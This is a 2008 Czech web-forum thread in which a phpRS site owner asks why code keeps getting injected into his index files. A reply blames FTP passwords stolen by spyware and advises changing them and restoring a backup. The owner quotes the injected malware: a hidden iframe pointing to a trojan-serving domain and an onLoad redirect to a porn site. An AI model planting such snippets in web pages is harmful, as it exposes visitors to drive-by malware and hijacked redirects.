Ostatní témata (Off Topic témata) : phpRS Fórum
Máte problém s konfigurací počítače? Hledáte nejlepší webhosting pro vaši aplikaci? Nevíte si rady s nějakým zajímavým programátorským oříškem? Týká se dotaz fóra? ... Pokud ano, tak je toto diskuzní fórum určeno právě vám.
phpRS - redakční a informační systém
Hacknuté stránky
Zaslán uživatelem/kou: mirasr (IP adresa zaznamenána)
Datum: 2008-11-10, 22:18

Dobrý večer,

asi tak před měsícem mi přestal zničeho nic fungovat web kvůli chybě v syntaxi. Když jsem kontroloval soubory, tak jsem narazil na cizí kod, který se mi vložil záhadným způsobem do všech souborů s názvem "index". V php indexech to bylo na konci kodu mezi ? a >.
Vypadal nějak takto:
<html><body><div style=visibility:hidden iframe src=http:\\biztraff.eu\in.cgi?22 width=100 height=80 </iframe> </div> </body> </html>

Smazal jsem ho, ale asi během 15 minut se vložil zase. Tak to šlo asi 14 dní, pak byl na týden pokoj a poté se začal vkládat kod nový, podobný jen s jiným odkazem. Tento kod jsem se pokusil obejít simulovaným body stránky, protože se kod v index.html vkládal přímo za <body>. Na konec kodu jsem vložil ještě jeden php kod se zakomentováním:
<?
/*<html><body></body></html> */ ?>
Tento způsob funguje. Ovšem problém nastává u html souborů, protože v nich nic zakomentovat nemůžu (alespoň nevím jak). Takže ten kod musím pokaždé promazávat.

Předchozí 2 odkazy, při otevření stránky html v prohlížeči, začaly stahovat do počítače trojské koně.
Dnes se začal vkládat další kod, který rovnou mou stránku přesměruje na nějaké ruské porno stránky.

<!-- ad --><body onLoad=javascript:self.location.href=http://porn-mix.ru/?&#112;&#97;&#114;&#116;&#110;&#101;&#114;&#61;&#50;&#56;&#51;><!-- /ad -->

Zajímalo by mne jak se mohou tyto kody automaticky vkládat do mých souborů? A jak bych mohl tomuto vkládání zabránit. Může to být způsobeno ftp? Kolega, který má přístup na ftp totiž na něj chodil přes počítač v nemocnici, ale nevím přesně jak se tam připojoval. Nebo by to mohlo být přes phprs administraci?

PS - web mi běží na phprs, ale druhý web, který jede na phprs také, je v pořádku.

Re: Hacknuté stránky
Zaslán uživatelem/kou: Kryšpín (IP adresa zaznamenána)
Datum: 2008-11-10, 23:41

někde jsem četl o způsobu, jak se z programů typu total comander dá zjistit uložené heslo k ftp (nějakým spywarem). měli jste to heslo v tc, nebo podobném uložené, nebo ne? Zkusil bych kontaktovat hosting a nechat si heslo změnit (nebo změnit sám, pokud to můžete zadministrovat, nejlépe z nějakého bezpečného počítače.) a nemít ho v tc. uložené, vždy ho tam vkládat z klávesnice. Pochopitelně ten počítač nechat prohlédnout, jeslti na něm není nějaký spyware. a až bude heslo nové, tak bych přehrál celý web nějakou zálohou.

Možná to nepíšu přesně, už si to moc nepamatuju ..
ale podobná diskuze se tu dá najít
[http://www.phprs.net/forum/read.php?32,31506,31520#msg-31520]

Hepbegclub | Čáslavsko | MN Čáslav



Celkem upraveno 1×. Poslední úprava Kryšpín v 10.11.2008 23:42.

Re: Hacknuté stránky
Zaslán uživatelem/kou: mirasr (IP adresa zaznamenána)
Datum: 2008-11-11, 19:53

Děkuji moc za radu. Já se připojuji přes web ftp. Ale zkusím se optat ostatních lidí, kteří mají přístup na ftp, jestli mají v TC uloženo heslo. Každopádně heslo nechám změnit.

Ještě jednou díky.



Lituji, ale pouze registrovaní uživatelé mohou zasílat příspěvky do této sekce.
This forum powered by Phorum and designed by STaNBoSS.